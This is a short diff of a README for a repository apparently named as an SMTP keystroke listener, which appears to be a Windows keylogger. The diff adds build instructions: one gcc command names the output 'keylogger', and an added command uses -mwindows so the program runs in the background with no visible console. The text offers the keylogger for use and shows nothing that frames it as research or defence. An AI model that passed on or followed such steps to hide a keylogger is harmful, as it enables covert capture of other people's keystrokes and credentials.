christoperisiderio/SMTProtocol-Keystrokes-Listener-V1/README.md

 # bash
 > gcc -o keylogger main.c -luser32
+If you want to run it in background without showing the console use this instead:

+>  gcc -o main.exe main.c -luser32 -lgdi32 -lws2_32 -lwinmm -mwindows

 # Prepare the Python environment:
 > Install required Python packages:
 # bash